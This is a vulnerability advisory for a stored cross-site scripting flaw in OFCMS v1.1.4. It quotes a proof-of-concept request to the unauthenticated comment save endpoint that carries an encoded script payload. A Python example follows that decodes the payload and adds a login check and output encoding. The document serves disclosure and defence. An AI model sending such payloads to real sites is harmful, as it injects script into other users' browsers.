A cross-site scripting vulnerability exists in the front page of the OFCMS system. The user comment function on the site's front end does not effectively escape its input parameters. In addition, the comment function does not require login, which makes this cross-site scripting vulnerability high risk.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://gitee.com/oufu/ofcms
[Affected Product Code Base]
v1.1.4
[Affected Component]
GET /ofcms/api/v1/comment/save.json?comment_content=%E6%B5%8B%E8%AF%95%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E111&content_id=47&site_id=1&check_status=1&_=1647846678826 HTTP/1.1
Host: localhost:7000
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
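The advisory names two defects: the comment content is not escaped, and the save endpoint needs no login. The following added example (not OFCMS code; the handler, session object and render function are hypothetical) takes the request line quoted above, URL-decodes the comment_content parameter, and shows what a safe handler would do with it: refuse the request when there is no authenticated session, and entity-encode the stored text for the HTML body context before it is rendered, so the script tag survives only as literal text.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed from the request line quoted in the advisory; only the
# comment_content parameter is used here.
REQUEST_LINE = (
    "GET /ofcms/api/v1/comment/save.json?comment_content="
    "%E6%B5%8B%E8%AF%95%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E111"
    "&content_id=47&site_id=1&check_status=1&_=1647846678826 HTTP/1.1"
)


def comment_from_request_line(request_line):
    """Return the decoded comment_content value from an HTTP request line."""
    target = request_line.split(" ")[1]          # "/ofcms/api/v1/...?..."
    query = urlsplit(target).query
    params = parse_qs(query, keep_blank_values=True)  # percent-decodes UTF-8
    return params.get("comment_content", [""])[0]


def encode_for_html_body(value):
    """Entity-encode text for insertion into an HTML element body.

    escape() with quote=True turns <, >, &, " and ' into entities, which is
    the right encoding for an element body or a double-quoted attribute; it
    is NOT sufficient for JavaScript, URL or CSS contexts.
    """
    return escape(value, quote=True)


def is_safe_for_html_body(encoded):
    """Check that no raw markup-significant characters survived encoding."""
    return not any(ch in encoded for ch in "<>\"'")


def save_comment(session, comment_content):
    """Hypothetical hardened save handler.

    `session` is a dict; a logged-in user is represented by a "user_id" key.
    Raw text is stored; encoding is applied at render time for the context
    the text lands in.
    """
    if not session.get("user_id"):
        raise PermissionError("login required to post a comment")
    return {"author": session["user_id"], "content": comment_content}


def render_comment(stored):
    """Render a stored comment into an HTML fragment with output encoding."""
    body = encode_for_html_body(stored["content"])
    return '<p class="comment">{}</p>'.format(body)


if __name__ == "__main__":
    raw = comment_from_request_line(REQUEST_LINE)
    print("decoded input :", raw)
    try:
        save_comment({}, raw)            # anonymous request, as in the advisory
    except PermissionError as err:
        print("anonymous save:", err)
    stored = save_comment({"user_id": "demo"}, raw)   # constructed session
    print("rendered      :", render_comment(stored))
```

Encoding at output time rather than at save time keeps the stored data faithful and lets the same comment be rendered safely into different contexts; the `is_safe_for_html_body` check is the kind of assertion a regression test for this endpoint should make on the rendered fragment.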